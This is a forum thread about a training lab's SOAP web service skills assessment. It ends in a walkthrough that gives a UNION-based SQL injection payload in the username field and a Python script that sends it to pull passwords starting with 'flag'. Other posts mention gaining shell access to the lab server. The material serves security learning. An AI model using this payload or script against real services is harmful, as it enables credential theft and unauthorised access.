Web Service & API Attacks - Skills Assessment

I used OpenAI and asked “If I use this sub-select “…(SELECT password FROM users WHERE username = ‘admin’ LIMIT 1);” How do I change it so that it only returns a row where the password begins with “FLAG” ?”

It provided me a subquery with a wildcard that helped me get the flag.

3 hours in and I still can't find it. Last exercise to finish the path; I crafted everything I could, automated, Burp, etc. I'm losing my mind, if someone could help me please!

Holy moly I got it. I was completely lost most of this module. I feel like the author did a terrible job explaining things in this one. Most of the modules I do pretty well following along but this one was a nightmare.

Basically, using the automate.py script they have in the earlier section and modifying it for Login requests rather than command execution, and adding a very basic SQLi payload, gave me the flag.

I did not care for this module at all and I hope they revisit it and update it to be more clear in the instructions.

First of all, thank you for all the comments; they helped me a lot in finishing this module.

This is how I did it. First you need to craft a Login request. Remember, if the connection hangs, you are on the right track. Using automate.py will save you time when sending payloads for the next task.

Next, you need to identify an SQLi vulnerability. Test your parameters [username:password]. Keep it simple. I highly recommend the SQL Injection Fundamentals module. Also, you can identify the DBMS in use with a simple SQLi; this can help you craft a sqlmap command.

Does anyone know how to get the flag through SQLi? I had done it through the shell.

Guys, I need help.

I have successfully accessed the server. I can see the home directory, the list of all data files, etc.
/app/soap-wsdl

or the list of usernames

...
lxd
usbmux
mysql
ubuntu

but at this moment I can't find the correct payload to submit for SQLi.

Can someone help me build a simple payload?

http://x.x.x.x:3002/wsdl?wsdl=1 and 1=1

Just curious, I managed to solve it using the SQL injection method.

How can we solve this using RCE?

I am writing this walkthrough because, in my opinion, it is one of the worst modules ever made; it is very incomplete and full of missing information.

  1. Identification of the problem and context

The API in use is a SOAP web service. SOAP requests are sent as XML. The user's input, such as username and password, is passed on to a function that probably performs an SQL query to authenticate the user.

The initial idea was to take advantage of an SQLi to manipulate the SQL query and get a password that starts with "flag". This led us to study how to inject SQL into an input parameter, so that the SQL query on the server returned the desired password.

  2. Analysis of the SOAP payload

The SOAP payload that interests us is the one that sends the username and password. In a vulnerable application, we can inject SQL directly into these parameters.

The basic payload (without SQL injection) would have a format similar to this:

<soap:Body>
  <LoginRequest xmlns="http://tempuri.org/">
    <username>admin</username>
    <password>password</password>
  </LoginRequest>
</soap:Body>
  3. First attempt at SQL injection

Initially we tried to inject a simple SQLi using a UNION SELECT:

admin' UNION SELECT password, NULL FROM users WHERE password LIKE '(Enter the parameter)' --

The result of this injection was that the server returned the password (or passwords) that started with “flag”, just as required.

  4. Adaptation of the Python script

We built a Python script to automatically send our SOAP request with the SQL injection. The script:

Asks the user for input (in this case, the LIKE pattern for the SQLi to be performed).
Builds the SOAP payload with the SQL injection.
Sends the request to the server via requests.post().
Prints the response containing the password (or the requested information).

Here is the final Python script:

import requests

# Interactive loop: each line typed at the prompt becomes the LIKE pattern
# inside the UNION SELECT, e.g. typing "flag%" asks for passwords that start
# with "flag". (The original script read the input but never used it.)
while True:
    cmd = input("$ ")

    # The injection goes into the <username> element; the trailing "-- "
    # comments out the rest of the server-side query.
    payload = f'''<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
    <soap:Body>
    <LoginRequest xmlns="http://tempuri.org/">
    <username>admin' UNION SELECT password, NULL FROM users WHERE password LIKE '{cmd}' -- </username>
    <password>password</password>
    </LoginRequest>
    </soap:Body>
    </soap:Envelope>'''

    response = requests.post(
        "http://ip:3002/wsdl",   # replace "ip" with the target address
        data=payload,
        headers={"SOAPAction": '"Login"'}
    )

    print(response.content)